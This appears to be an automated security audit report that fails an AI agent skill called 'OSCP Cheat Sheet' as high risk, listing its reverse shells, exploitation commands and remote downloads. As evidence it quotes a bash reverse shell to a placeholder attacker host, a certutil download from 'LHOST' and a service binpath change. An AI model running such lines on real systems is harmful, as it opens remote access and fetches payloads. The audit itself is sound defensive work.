OSCP Cheat Sheet
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- REMOTE_CODE_EXECUTION (HIGH): The skill contains multiple 'one-liner' reverse shell payloads in Bash, Python, and PowerShell. These are designed to provide remote command-line access to an attacker.
- Evidence: Section 5 (Exploitation) includes
bash -i >& /dev/tcp/KALI/443 0>&1and a PowerShell TCPClient script. - COMMAND_EXECUTION (HIGH): The skill provides a comprehensive list of commands for system enumeration, service exploitation, and Active Directory attacks.
- Evidence: Sections 3, 4, 6, and 7 detail commands for directory traversal, SQL injection, and modifying service configurations (e.g.,
sc config SERVICE binpath=). - EXTERNAL_DOWNLOADS (MEDIUM): It instructs the agent/user on how to download files (likely malware or enumeration scripts) from remote hosts using tools like certutil, powershell, wget, and curl.
- Evidence: Section 2 (File Transfers) demonstrates using
certutil -urlcache -split -f "http://LHOST/file"andInvoke-WebRequest.
Recommendations
- AI detected serious security threats
Audit Metadata